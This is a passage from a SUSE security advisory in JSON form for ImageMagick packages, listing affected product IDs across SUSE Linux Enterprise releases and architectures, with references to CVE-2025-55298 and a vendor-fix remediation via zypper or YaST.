"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55298",
"url": "https://www.suse.com/security/cve/CVE-2025-55298"
},
{
"category": "external",
"summary": "SUSE Bug 1248780 for CVE-2025-55298",
"url": "https://bugzilla.suse.com/1248780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
